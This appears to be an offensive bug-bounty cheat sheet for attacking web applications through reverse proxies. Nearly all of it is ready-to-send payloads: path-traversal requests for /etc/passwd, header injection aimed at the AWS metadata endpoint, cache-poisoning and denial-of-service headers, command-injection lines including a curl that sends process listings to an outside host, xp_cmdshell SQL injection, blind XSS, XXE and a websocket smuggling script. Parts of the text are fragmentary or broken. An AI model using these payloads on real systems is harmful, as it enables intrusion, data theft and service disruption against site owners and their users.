Secondary context refers to the different ways a web application can handle and process requests indirectly related to the main content. This often involves proxies, back-end servers, and intermediate services that might introduce additional security risks.
Identify Some " Hidden " Reverse HTTP Proxies
The heuristic rules used are the following :
A 502 status code is returned (RFC 2616, section 14.31)
A 483 status code is returned (RFC 3261, section 8.1.1.6)
When using TRACE, the body contains the 'X-Forwarded-For' string
'Via' or 'X-Via' headers are detected
Some fields are different between hops :
HTTP status codes
'Server' headers
'Content-Type' headers
'Via' headers
HTML titles
HTML 'address' tags
'X-Forwarded-For' values in body
Identify Routing Of HTTP Request
Does /Endpoint-To-Proxy/../ Return Something Different Than /
Does /Endpoint-To-Proxy/../ Return Headers Different Than /
Try To Inject Encode , Double OR Triple URL Encoding In Parameters
e.g. https://www.company.com/api/path?id=%23
.
%2e
#
%23
?
%3F
&
%26
/
%2F
@
%40
Try To Inject Encode , Double OR Triple URL Encoding These Payloads After URL
..%2f%23
..;/
..%00/
..%0d/
..%5c
..\
..%ff/
%2e%2e%2f
.%2e/
e.g. https://www.company.com/api/..%00/
Using OPTIONS Method for endpoint discovery
Using OPTIONS Method to identify other endpoints
Check PUT Method
Try To Change Request Method To PUT If You Got 201 Created Then There Is RCE
Steps to produce :-
1 - Collect All The Endpoints
2 - Put It In File Called e.g. url.txt
3 - Open Your Terminal
4 - Write This Command python3 h2csmuggler.py --scan-list url.txt --threads 5
Smuggling WebSockets
Smuggler Websocket Endpoints
import socket
req1 = '''GET /ُEndpoint-To-Proxy/ HTTP/1.1
Host: company.com
Sec-WebSocket-Version: 1337
Upgrade: websocket
'''.replace('\n', '\r\n')
req2 = '''GET /Internal-Endpoint HTTP/1.1
Host: localhost:PORT
'''.replace('\n', '\r\n')
def main(netloc):
host, port = netloc.split(':')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, int(port)))
sock.sendall(req1)
sock.recv(4096)
sock.sendall(req2)
data = sock.recv(4096)
data = data.decode(errors='ignore')
print data
sock.shutdown(socket.SHUT_RDWR)
sock.close()
-----------------------------------------------------------------------------
Steps to produce :-
1 - Open Your Terminal
2 - Write This Command
python3 websocket-smuggler.py
XSS
XSS in Referrer
Referer: "><script src=//me.xss.ht></script>
If There Is Nginx As Reverse Proxy Try To Inject Blind XSS Payloads
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data
Content-Type: application/json
Content-Length: Number
Origin: https://www.company.com
parameter=value
Invalid Content-Type Header
Content-Type: */*
Inject l5d-dtab Header
If There Is Linkerd Service Try To Inject l5d-dtab Header e.g. l5d-dtab: /$/inet/169.254.169.254/80 To Get AWS metadata
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
l5d-dtab: /$/inet/169.254.169.254/80
Content-Length: Number
Origin: https://www.company.com
parameter=value
Content-Length Header With Number And There Is Not Body Content To Expose Internal Information
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Content-Length: Number
Origin: https://www.company.com
Cache Poisoning and DOS
GET /Endpoint-To-Proxy HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Host: RandomString(10).id.burpcollaborator.net
--------------------------
GET /Endpoint-To-Proxy HTTP/1.1
User-Agent: Mozilla/5.0
Host: RandomString(10).id.burpcollaborator.net
Host: company.com
----------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
--------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
X-Forwarded-Host: www.company.com:PORT
--------------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
X-Forwarded-Host: www.company.com
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
-----------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
X-Forwarded-Server: RandomString(10).id.burpcollaborator.net
-------------------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: null
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
----------------------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: '-alert(1)-'
->https://www.youtube.com/watch?v=bDxYWGxuVqE
------------------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
X-Forwarded-Scheme: nothttps
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
-> https://www.youtube.com/watch?v=j2RrmNxJZ5c
--------------------------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
X-Host: RandomString(10).id.burpcollaborator.net
--------------------------------------------------
X-Host: RandomString(10).id.burpcollaborator.net
------------------
X-Oversized-Header-1: xxxxx 20K xxxx
X-Oversized-Header-2: xxxxx 20K xxxx
---------------------------
X-Metachar-Header: \n
-> https://cpdos.org/
--------------------------------------------------
X-HTTP-Method-Override: PUT
- https://blog.appsecco.com/aws-ec2-imdsv2-versus-an-esoteric-http-method-8bc1b9616ae8
- https://cpdos.org/
----------------------
X-Forwarded-Port: 123
- https://portswigger.net/research/responsible-denial-of-service-with-web-cache-poisoning
- https://hackerone.com/reports/409370
----------------------------------
X-Forwarded-SSL: off
- https://portswigger.net/research/responsible-denial-of-service-with-web-cache-poisoning
---------------------
Max-Forwards: 0
------------------------------
zTransfer-Encoding: xxxx
--------------
Accept_Encoding: xxxx
-------------------
Range: bytes=cow
-----------------------
User-Agent: xxxx 20K xxxx
------------------------
Try To Inject Keep-Alive , Transfer-Encoding , Trailer , Upgrade , Proxy-Authorization , TE
Connection OR Proxy-Authenticate e.g. Connection: close, Cookie To Abuse Hop-By-Hop
Connection: close, Cookie
- https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers
-----------------------------
Try To Inject ?%xx , %xx OR %xxx 20k xxx e.g. Endpoint-To-Proxy/%xx To
Do DOS Attack
GET /Endpoint-To-Proxy/%xxx 20k xxx HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
- https://hackerone.com/reports/500686
----------------------------
Try To Add Parameter With Value e.g. ?parameter=cache OR If There Is Parameters
Try To Add Another e.g. lang=en¶meter=cache To Achieve Cache Poisoning
GET /Endpoint-To-Proxy?parameter=cache HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
- https://www.youtube.com/watch?v=bDxYWGxuVqE
------------------------------------------------
Add Parameter With Large Value e.g. ?parameter=xxx 20K xxx
GET /Endpoint-To-Proxy?parameter=xxxx 20K xxxx HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
- https://www.youtube.com/watch?v=bDxYWGxuVqE
----------
GET /Endpoint-To-Proxy?_parameter=cache HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
- https://www.youtube.com/watch?v=bDxYWGxuVqE
;parameter=cache
--------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Connection: keep-alive
parameter=cache
_parameter=cache
LFI
If There Is Nginx As Reverse Proxy AND Weblogic As Backend Try To Use /#/../ To Change Route Of Endpoints
GET /Endpoint-To-Proxy/#/../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
---------------------------------------
GET /../../../../../../../etc/passwd;/../Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
---------------------------------------
GET /Endpoint-To-Proxy../../../../../../../etc/passwd HTTP/1.1
Host: www.company.com
--------------------------------------------
GET /Endpoint-To-Proxy/..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
------------------------------------------
Try To Inject \..\.\..\.\..\.\..\.\..\.\..\.\Internal-Endpoint OR
\..\..\..\.\..\..\Internal-Endpoint\..\..\..\..\..\etc\passwd%3F.js
GET /Endpoint-To-Proxy\..\.\..\.\..\.\..\.\Internal-Endpoint HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
---------------------------------------------
Let’s Assume There Is Routing To Pulse Secure SSL VPN So ,
Try To Inject To Get File etc/hosts
GET /Endpoint-To-Proxy/dana-na/../dana/html5acc/guacamole/../
../../../../../etc/hosts?/dana/html5acc/guacamole/# HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
----------------------------------------------------
s Apache As Reverse Proxy Try To Use /..// To Change Route Of Endpoints
GET /Endpoint-To-Proxy/..//../../../../../../etc/passwd HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
--------------------------------------------------
If There Is Apache As Reverse Proxy Try To Use %3F To Bypass Blacklist Of
Endpoints
GET /Endpoint-To-Proxy/.git%3FAllowed HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
------------------------------------------------
If There Is Nginx As Reverse Proxy
AND Apache As Backend Try To Use //../ To Change Route Of Endpoints
GET /Endpoint-To-Proxy/../../../../../../../etc/passwd//../ HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
-------------------------------------------------------
If There Is Nginx As Reverse Proxy Try To Use ..;/ To Bypass Blacklist Of Endpoints
OR Bypass CORS
GET /Endpoint-To-Proxy/..;/../../../../../../etc/passwd HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
---------------------------------------
GET /../../../../etc/passwd/..;/Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
----------------------------------------
GeT /Endpoint-To-Proxy/../../../../../../etc/passwd HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
------------------------------------------
# If There Is Varnish As Reverse Proxy
GeT /Endpoint-To-Proxy/../../../../../../etc/passwd HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
------------------------------------------
# If There Is Haproxy OR Varnish As Reverse Proxy
GET http://company.com/Endpoints-To-Proxy/.git HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
-------------------------------------
RCE
Try To Change Method To POST And Add Body e.g. To Get RCE
GET /Endpoint-To-Proxy/(${T(java.lang.Runtime).
getRuntime().exec('nslookup id.burpcollaborator.net')}) HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
SQLi
GET /Endpoint-To-Proxy/
'xor(if(mid(database(),1,1)=0x41,sleep(30),0))or HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
GET /Endpoint-To-Proxy/
'xor(if(mid(database(),1,1)=0x41,sleep(30),0))or HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
CRLF
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{
"parameter":"value%0A%01%09Host:%20id.burpcollaborator.net"
}
Paameter Manipulation
Assume Backend Endpoint Take Value Of One Parameter As Path So Inject Encode , Double OR Triple URL Encoding ;@me.com , @me.com OR :@me.com To Get SSRF
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{
"parameter":";@RandomString(10).id.burpcollaborator.net"
}
Assume Backend Endpoint Take Value Of One Parameter As Rewrite Configuration e.g. rewrite ^.*$ $arg_parameter; So Inject e.g. LFI Payloads To Get e.g. LFI
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{ "parameter":"../../../../../../../../../../../../etc/passwd" }
RCE
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{"parameter":"${nslookup id.burpcollaborator.net}"}
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{
"parameter":"&nslookup me.com&'\"`0&nslookup me.com&`'"
}
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{
"parameter":"0 -write |ps${IFS}aux|curl${IFS}http://me.com${IFS}-d${IFS}@-"
}
SQL Injection
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{"parameter":"; DECLARE @command varchar(255); SELECT
@command='ping id.burpcollaborator.net'; EXEC
Master.dbo.xp_cmdshell @command; SELECT 1 as 'STEP'"}
Blind XSS
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
Content-Type: application/json
Content-Length: Number
{
"parameter":"</script><svg/onload='+/"/+/onmouseover=1/+(s=do
cument.createElement(/script/.source),s.stack=Error().stack,s.src
=(/,/+/RandomString(10).id.burpcollaborator.net/).slice(2),docume
nt.documentElement.appendChild(s))//'>"
}
XXE
If Body Of Request JSON Data , Try To Convert It XML With XXE Payloads
POST /Endpoint-To-Proxy/ HTTP/1.1
Host: www.company.com
Content-Type: application/xml
Content-Length: Number
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<parame
POST /Endpoint-To-Proxy/ HTTP/1.1
Host: www.company.com
Content-Type: application/xml
Content-Length: Number
<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xml "href="http://RandomString(10).id.burpcollaborator.net/file.xsl"?>
<!DOCTYPE root PUBLIC "-//A/B/EN" http://RandomString(10).id.burpcollaborator.net/file.dtd [
<!ENTITY % remote SYSTEM "http://RandomString(10).id.burpcollaborator.net/path">
<!ENTITY xxe SYSTEM "http://RandomString(10).id.burpcollaborator.net/path">
%remote;
]>
<root>
<foo>&xxe;</foo>
<x xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:includehref="http://RandomString(10).id.burpcollaborator.net/" ></x>
<y xmlns=http://a.b/
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://a.b/
http:///RandomString(10).id.burpcollaborator.net/file.xsd">a</y>
</root>
RealWorld Examples
References
Using tool.
Try To Append .json Extension To Your Endpoints e.g. /endpoint-To-Proxy.json To Get Sensitive Information ->
Try To Figure Out Are There Endpoints Accept Establishing HTTP/2 Cleartext , If Yes Try To Smuggler It By Using Tool e.g.
